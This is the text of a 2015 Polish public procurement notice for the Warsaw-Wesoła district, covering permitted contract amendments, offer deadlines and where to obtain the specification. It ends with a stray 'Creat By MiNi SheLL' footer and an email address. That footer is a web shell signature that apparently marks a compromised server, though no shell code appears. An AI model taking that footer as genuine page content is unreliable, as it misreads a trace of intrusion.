<p>1.	W trakcie realizacji umowy, postanowienia umowy mogą ulec zmianom pod warunkiem, że zmiany te będą korzystne dla Zamawiających, lub konieczność wprowadzenia zmian wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, przy czym zmiany postanowień umowy mogą dotyczyć:
1.1.	Zmiana terminu realizacji przedmiotu umowy w przypadku:
1.1.1.	wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
1.1.2.	wstrzymania przez właściwego Zamawiającego wykonania robót, które nie wynika 
z okoliczności leżących po stronie Wykonawcy (nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru w przypadku stwierdzenia nieprawidłowości zawinionych przez Wykonawcę),
1.1.3.	konieczności wykonania przez właściwego Zamawiającego korekty projektu dla usunięcia wad w dostarczonej dokumentacji,
1.1.4.	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności (np. działania osób trzecich),
1.1.5.	okoliczności zaistniałych w trakcie realizacji przedmiotu umowy, tj. warunków atmosferycznych, archeologicznych, geologicznych, hydrologicznych, kolizji z sieciami infrastruktury, utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu umowy - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez Inspektora Nadzoru Inwestorskiego.
W przypadku zmiany terminu realizacji przedmiotu umowy wynikającego z okoliczności wymienionych powyżej, termin może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności.
1.2.	Zamawiający dopuszczają możliwość zmiany wynagrodzenia w przypadku niemożliwej do przewidzenia w chwili zawarcia umowy konieczności zmiany zakresu zamówienia, 
o ile jest ona korzystna dla realizacji zadania i dotyczy zmniejszenia zakresu przedmiotu zamówienia.
1.3.	Zmiana oznaczenia danych dotyczących Zamawiających i/lub Wykonawcy,
1.4.	Rozszerzenie odpowiedzialności z tytułu rękojmi oraz przedłużenie terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez Wykonawcę.
1.5.	Zmiana zakresu rzeczowo-finansowego zamówienia w przypadku wystąpienia obiektywnych okoliczności skutkujących koniecznością zmiany w trakcie realizacji umowy zakresu rzeczowo-finansowego robót,
1.6.	Zmiana Harmonogramu rzeczowo-finansowy robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wesola.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Stołeczne Warszawa  Dzielnica Wesoła  
ul. 1. Praskiego Pułku 33, 
05-075 Warszawa-Wesoła
Zespół Zamówień Publicznych, pok. 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2015 godzina 10:00, miejsce: Urząd m.st. Warszawy Dzielnica Wesoła, ul. 1 Praskiego Pułku nr 33, 05-075 Warszawa-Wesoła - Wydział Obsługi Mieszkańców, Sala Obsługi, stanowisko Nr 5 lub Nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com